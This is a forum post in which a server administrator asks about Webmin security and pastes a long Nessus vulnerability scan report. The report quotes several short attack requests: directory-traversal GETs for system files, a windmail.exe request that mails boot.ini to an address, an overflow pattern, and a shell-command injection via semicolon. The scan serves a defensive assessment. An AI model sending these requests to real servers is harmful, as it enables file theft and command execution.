Nessus & Webmin Security Questions
Hi guys,
@ the moment I'm working on securing a web-server. I installed Nessus to
know where to start from with the big problems. Seems like Nessus thinks
that one of the biggest problem is webmin? Can anybody tell me some
experiences? Is there a possibility to further restrict, or replace some
parts of webmin (see text below)? I really would like to use it....
Also what's quite annoying, that Nessus says that
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
I've tried a lot of settings but it seems that I'm missing the safe checks,
any idea where to find those? How can I REALLY stress webmin, to see if it's
save? Of course I'm using the ssl variant :-)! Where is the check box for
the safe checks O_o ?????
On the client side I use (don't hit me :-) NessusMX, the Wintendo Client,
and on the server side the nessusd with version 1.2.7. I already searched
the FAQ @ nessus.org. I did an upgrade on the plugins via
/usr/sbin/nessus-update-plugins. But the warinings remain.
Any help is greatly appreciated,
Simmel
That's what Nessus suggests, and there are even more :/ these are only High
and Serious warnings (didn't copy the low ones)
----------------------------------snip----------snip-------snip------------s
nip-------------------------
unknown (10000/tcp) High It is possible to read
any file on the remote system by prepending
several dots before the file name.
Example :
GET ........../config.sys
Solution : Disable this service and install
a real Web Server.
Risk factor : High
CVE : CVE-1999-0386
unknown (10000/tcp) High
The CGI /scripts/tools/newdsn.exe is present.
This CGI allows any attacker to create files
anywhere on your system if your NTFS permissions
are not tight enough, and can be used to overwrite
DSNs of existing databases.
Solution : Remove newdsn.exe
Risk factor : High
CVE : CVE-1999-0191
unknown (10000/tcp) High The 'nph-publish.cgi' is installed. This CGI has
a well known security flaw that lets an attacker to execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-1177
unknown (10000/tcp) High
The 'webdist.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0039
unknown (10000/tcp) High
Some versions of the mini-sql program comes with a
w3-msql CGI which is vulnerable to a buffer overflow.
An attacker may use it to gain a shell on this system.
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
Solution : contact the vendor of mini-sql (http://hugues.com.au)
and ask for a patch. Meanwhile, remove w3-msql from
/cgi-bin
Risk factor : High
CVE : CVE-2000-0012
unknown (10000/tcp) High The CGI 'wwwwais' is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-2001-0223
Risk factor : Serious
CVE : CVE-1999-0951
unknown (10000/tcp) High
There may be a buffer overrun in
the 'cgitest.exe' CGI program, which will allow anyone to
execute arbitrary commands with the same privileges as the
web server (root or nobody).
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-2002-0128
unknown (10000/tcp) High
There may be buffer overflow in the remote cgi win-c-sample.exe.
An attacker may use this flaw to execute arbitrary commands
on this host.
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
Solution : delete it
Risk factor : High
CVE : CVE-1999-0178
unknown (10000/tcp) High
There may be a buffer overflow in the remote
htimage.exe cgi when it is given the request :
/cgi-bin/htimage.exe/AAAA[....]AAA?0,0
An attacker may use it to execute arbitrary code
on this host.
*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.
Solution : delete it
Risk factor : High
CVE : CAN-2000-0256
unknown (10000/tcp) High
The file /admin-serv/config/admpw is readable.
This file contains the encrypted password for the Netscape
administration server. Although it is encrypted, an attacker
may attempt to crack it by brute force.
Solution : Remove read access permissions for this file and/or stop
the Netscape administration server.
Risk factor : Medium
unknown (10000/tcp) High
It is possible to read arbitrary files on
the remote server by prepending ../../
or ..\..\ in front on the file name.
Solution : Use another web server
Risk factor : High
unknown (10000/tcp) High It was possible to read the content of /EXT.INI
(BadBlue configuration file) by sending an invalid GET request.
A cracker may exploit this vulnerability to steal the passwords.
Solution : upgrade your software or protect it with a filtering reverse
proxy
Risk factor : Medium
unknown (10000/tcp) High The file /wwwboard/passwd.txt exists.
This file is installed by default with Matt's Script wwwboard
software. This can be a high risk vulnerability if the
password used is the same for other services. An attacker
can easily take over the board by cracking the passwd.
Solution : Configure the wwwadmin.pl script to put
the passwd.txt file somewhere else.
Risk factor : High
CVE : CVE-1999-0953
unknown (10000/tcp) High The CGI 'AnyForm2' is installed.
Old versions of this CGI have a well known security flaw that lets
anyone execute arbitrary commands with the privileges of the http daemon
(root or nobody).
Solution : remove it.
Risk factor : Serious
CVE : CVE-1999-0066
unknown (10000/tcp) High
IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages,
namely /iissamples/exair/search/query.asp, may be used to make IIS hang,
thus preventing it from answering to legitimate clients.
Solution : Delete the 'ExAir' sample IIS site
Risk factor : Medium
CVE : CVE-1999-0449
unknown (10000/tcp) High
IIS comes with the sample site 'ExAir'.
Unfortunately, one of its pages,
namely /iissamples/exair/search/search.asp,
may be used to make IIS hang, thus preventing
it from answering to legitimate clients.
Solution : Delete the 'ExAir' sample IIS site
Risk factor : Medium
CVE : CVE-1999-0449
unknown (10000/tcp) High IIS comes with the sample site 'ExAir'.
Unfortunately,
one of its pages, namely /iissamples/exair/search/advsearch.asp, may
be used to make IIS hang, thus preventing it from answering to legitimate
clients.
Risk factor : Medium/High
Solution : Delete the 'ExAir' sample IIS site
CVE : CVE-1999-0449
unknown (10000/tcp) High The 'wrap' CGI is installed. This CGI allows
anyone to get a listing for any directory with mode +755.
*** Note that all implementations of 'wrap' are not
*** vulnerable. See the relevant CVE entry.
Solution : remove it from /cgi-bin.
Risk factor : Low/Medium
CVE : CVE-1999-0149
unknown (10000/tcp) High
alya.cgi is a cgi backdoor distributed with
multiple rootkits.
Risk factor : Serious
unknown (10000/tcp) High The remote HTTP server
allows an attacker to read arbitrary files
on the remote web server, simply by adding
dots in front of its name :
Example:
GET /../../winnt/boot.ini
will return C:\winnt\boot.ini
Solution : Upgrade your web server or change it.
Risk factor : Serious
CVE : CAN-1999-0776
unknown (10000/tcp) High The 'get32.exe' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-1999-0885
unknown (10000/tcp) High
It may be possible for an attacker to reconfigure the
remote web server by requesting :
GET /scripts/wsisa.dll/WService=anything?WSMadmin
Solution : Edit the ubroker.properties file and change
AllowMsngrCmds = 1
to :
AllowMsngrCmds = 0
Risk factor : High
CVE : CVE-2000-0127
unknown (10000/tcp) High
The file /site/eg/source.asp is present.
This file comes with the Apache::ASP package
and allows anyone to write to files in the
same directory.
An attacker may use this flaw to upload his
own scripts and execute arbitrary commands
on this host.
Solution : Upgrade to Apache::ASP 1.95
Risk factor : Serious
CVE : CVE-2000-0628
unknown (10000/tcp) High
A security vulnerability in Apache 2.0.39 on Windows systems
allows attackers to access files that would otherwise be
inaccessible using a directory traversal attack.
A cracker may use this to read sensitive files or even execute
any command on your system.
Solutions:
- Upgrade to Apache 2.0.40
- or install it on a Unix machine
- or add in your httpd.conf, before the first
'Alias' or 'Redirect' directive:
RedirectMatch 400 \\\.\.
Risk factor : High
CVE : CAN-2002-0661
unknown (10000/tcp) High
The Cart32 e-commerce shopping cart is installed.
This software contains several security flaws :
- it may contain a backdoor
- users may be able to change the admin password remotely
You should use something else.
See also : http://www.cerberus-infosec.co.uk/advcart32.html
Solution : use another shopping cart software
Risk factor : High
CVE : CAN-2000-0429
unknown (10000/tcp) High
A security vulnerability in BadBlue allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
Solution: Contact the vendor for a patch
Risk factor : High
unknown (10000/tcp) High
basilix.php3 is installed on this web server. Some versions
of this webmail software allow the users to read any file on
the system with the permission of the webmail software, and
execute any PHP.
Solution : Update Basilix or remove DUMMY from lang.inc
Risk factor : Low
CVE : CAN-2001-1045
unknown (10000/tcp) High The 'bboard' servlet is installed in
/servlet/sunexamples.BBoardServlet. This servlet has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it.
Risk factor : Serious
CVE : CAN-2000-0629
unknown (10000/tcp) High
BizDB is a web database integration product
using Perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's
contents to an unchecked open() call and
can therefore be made to execute commands
at the privilege level of the webserver.
The variable is dbname, and if passed a
semicolon followed by shell commands they
will be executed. This cannot be exploited
from a browser, as the software checks for
a referrer field in the HTTP request. A
valid referrer field can however be created
and sent programmatically or via a network
utility like netcat.
see also : http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm
Risk factor : Serious
CVE : CVE-2000-0287
unknown (10000/tcp) High
RedHat Linux 6.0 installs by default a squid cache manager cgi script with
no restricted access permissions. This script could be used to perform a
port scan from the cgi-host machine.
Solution :
If you are not using the box as a Squid www proxy/cache server then
uninstall the package by executing:
/etc/rc.d/init.d/squid stop
rpm -e squid
If you want to continue using the Squid proxy server software, make the
following actions to tighten security access to the manager interface:
mkdir /home/httpd/protected-cgi-bin
mv /home/httpd/cgi-bin/cachemgr.cgi /home/httpd/protected-cgi-bin/
And add the following directives to /etc/httpd/conf/access.conf and
srm.conf:
--- start access.conf segment ---
# Protected cgi-bin directory for programs that
# should not have public access
order deny,allow
deny from all
allow from localhost
#allow from .your_domain.com
AllowOverride None
Options ExecCGI
--- end access.conf segment ---
--- start srm.conf segment ---
ScriptAlias /protected-cgi-bin/ /home/httpd/protected-cgi-bin/
--- end srm.conf segment ---
Risk factor : High
CVE : CVE-1999-0710
unknown (10000/tcp) High The 'campas' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0146
unknown (10000/tcp) High 'cgiwrap' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
*** Note that all versions of cgiwrap are not affected
*** by this problem ! Consult your vendor.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-1530
unknown (10000/tcp) High
It is possible to read the include file of PCCS-Mysql,
dbconnect.inc on the remote server.
This include file contains information such as the
username and password used to connect to the database.
Solution:
Versions 1.2.5 and later are not vulnerable to this issue.
A workaround is to restrict access to the .inc file.
Risk factor : High
CVE : CVE-2000-0707
unknown (10000/tcp) High /cgi-bin/.cobalt/overflow/overflow.cgi was
detected.
Some versions of this CGI allow remote users to execute arbitrary commands
with the privileges of the web server.
*** Nessus just checked the presence of this file
*** but did not try to exploit the flaw, so this might
*** be a false positive
See: http://www.cert.org/advisories/CA-2002-35.html
Solution : get a newer software from Cobalt
Risk factor : High
unknown (10000/tcp) High The 'Count.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0021
unknown (10000/tcp) High
The script /cart/cart.cgi is present.
If this shopping cart system is the Dansie
Shopping Cart, and if it is older than version 3.0.8
then it is very likely that it contains a backdoor
which allows anyone to execute arbitrary commands on this system.
Solution : use another cart system
Risk factor : High
CVE : CVE-2000-0252
unknown (10000/tcp) High The 'Perl' CGI is installed and can be launched
as a CGI. This is equivalent to giving a free shell to an attacker, with the
http server privileges (usually root or nobody).
Solution : remove it from /cgi-bin
Risk factor : Serious
CVE : CAN-1999-0509
unknown (10000/tcp) High At least one of these file or directories is
world readable :
/webcart/orders/
/webcart/orders/import.txt
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart-lite/orders/import.txt
/webcart-lite/config/clients.txt
This misconfiguration may allow an attacker to gather
the credit card numbers of your clients.
Solution : Do not make directories world readable.
Risk factor : High
CVE : CAN-1999-0610
unknown (10000/tcp) High The Excite for Webservers is installed. This CGI
has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Versions newer than 1.1. are patched.
Solution : if you are running version 1.1 or older, then
upgrade it.
Risk factor : Serious
CVE : CVE-1999-0279
unknown (10000/tcp) High
ServletExec has a servlet called 'UploadServlet' in its server
side classes. UploadServlet, when invokable, allows an
attacker to upload any file to any directory on the server. The
uploaded file may have code that can later be executed on the
server, leading to remote command execution.
Solution : Remove it
Risk factor : Serious
CVE : CVE-2000-1024
unknown (10000/tcp) High It is possible to fill the hard disk of a server
running OmniHTTPd by issuing the request :
http://omni.server/cgi-bin/visadmin.exe?user=guest
This allows an attacker to crash your web server.
This script checks for the presence of the faulty CGI, but
does not execute it.
Solution : remove visadmin.exe from /cgi-bin.
Risk factor : Medium/High
CVE : CAN-1999-0970
unknown (10000/tcp) High
The remote web server appears to be running with
Frontpage extensions and lets the file 'authors.pwd'
to be downloaded by everyone.
This is a security concern since this file contains
sensitive data.
Solution : Contact Microsoft for a fix.
Risk factor : Medium
unknown (10000/tcp) High The CGI 'viralator.cgi' is installed.
Some versions of this CGI are don't check properly the user
input and allow anyone to execute arbitrary commands with
the privileges of the web server
** No flaw was tested. Your script might be a safe version.
Solutions : Upgrade this script to version 0.9pre2 or newer
Risk factor : Serious
CVE : CAN-2001-0849
unknown (10000/tcp) High The 'glimpse' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Note that we could not actually check for the presence
of this vulnerability, so you may be using a patched
version.
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0147
unknown (10000/tcp) High The 'guestbook.cgi' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0237
unknown (10000/tcp) High The 'guestbook.pl' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : Serious
CVE : CAN-1999-1053
unknown (10000/tcp) High The 'plusmail' CGI is installed. Some
versions of this CGI have a well known security flaw that
lets an attacker execute arbitrary
commands with the privileges of the http daemon
(usually root or nobody).
Solution : remove it from /cgi-bin. No patch yet
Risk factor : Serious
CVE : CAN-2000-0074
unknown (10000/tcp) High The 'webgais' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin
Risk factor : Serious
CVE : CVE-1999-0176
unknown (10000/tcp) High The 'jj' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : Remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0260
unknown (10000/tcp) High The Cobalt 'siteUserMod' CGI is installed.
Older versions of this CGI allow any user to change the
administrator password.
Make sure you are running the latest version.
Solution :
RaQ 1 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ1-Security-3.6.pkg
RaQ 2 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ2-Security-2.94.pkg
RaQ 3 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ3-Security-2.2.pkg
Risk factor : High
CVE : CVE-2000-0117
unknown (10000/tcp) High
The web server is probably susceptible to a common IIS vulnerability
discovered by
'Rain Forest Puppy'. This vulnerability enables an attacker to execute
arbitrary
commands on the server with Administrator Privileges.
See Microsoft security bulletin (MS99-025) for patch information.
Also, BUGTRAQ ID 529 on www.securityfocus.com
(http://www.securityfocus.com/bid/529)
Risk factor : High
CVE : CVE-1999-1011
unknown (10000/tcp) High The 'uploader.exe' CGI is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
CGI on the server, and then execute them.
Solution : remove it from /cgi-win.
Risk factor : Serious
CVE : CVE-1999-0177
Risk factor : High
unknown (10000/tcp) High
The file /ncl_items.html or /ncl_subjects.html exist on the remote system.
It is very likely that this file will allow an attacker
to reconfigure your Tektronix printer.
An attacker can use this to prevent the users of your
network from working properly by preventing them
from printing their files.
Solution : Filter incoming traffic to port 80 to this
device, or disable the Phaserlink webserver on the
printer (can be done by requesting
http://printername/ncl_items?SUBJECT=2097)
Risk factor : Low
CVE : CAN-1999-1508
unknown (10000/tcp) High The 'ping.asp' CGI is installed. Some versions
allows a cracker to launch a ping flood against your
machine or another by entering
'127.0.0.1 -l 65000 -t' in the Address field.
Solution : remove it.
Risk factor : Serious
unknown (10000/tcp) High
It is possible to read arbitrary files on the remote
Snapstream PVS server by prepending ../../ in front on the
file name.
It may also be possible to read ../ssd.ini which contains
many informations on the system (base directory, usernames &
passwords).
Solution : Upgrade your software or change it!
Risk factor : High
unknown (10000/tcp) High The 'windmail.exe' CGI is installed.
Some versions of this CGI script have a security flaw that lets
an attacker execute arbitrary commands on the remote server.
To test this, make the following request :
GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20you@youraddress.com
(replace you@youraddress.com by your real email address).
If you receive the content of the file boot.ini,
then your server is vulnerable.
Solution : remove it from /cgi-bin. See www.geocel.com
for a new version.
Risk factor : Serious
CVE : CAN-2000-0242
unknown (10000/tcp) High The 'websendmail' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : Remove it from /cgi-bin.
Risk factor : Serious
CVE : CVE-1999-0196
unknown (10000/tcp) High The 'upload.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
files on the remote web server.
Solution : remove it from /cgi-bin.
Risk factor : Serious
unknown (10000/tcp) High
Trend Micro OfficeScan Corporate Edition (Japanese version: Virus
Buster Corporate Edition) web-based management console let anybody
access /officescan/hotdownload without authentication.
Reading the configuration file /officescan/hotdownload/ofcscan.ini
will reveal information on your system. More, it contains passwords
that are encrypted by a weak specific algorithm
so they might be
decrypted
Solution : upgrade OfficeScan
Risk factor : Low
unknown (10000/tcp) High
The remote web server has one of these shells installed
in /cgi-bin :
ash, bash, csh, ksh, sh, tcsh, zsh
Leaving executable shells in the cgi-bin directory of
a web server may allow an attacker to execute arbitrary
commands on the target machine with the privileges of the
http daemon (usually root or nobody).
Solution : Remove all the shells from /cgi-bin.
Risk factor : Serious
CVE : CAN-1999-0509
Reply to: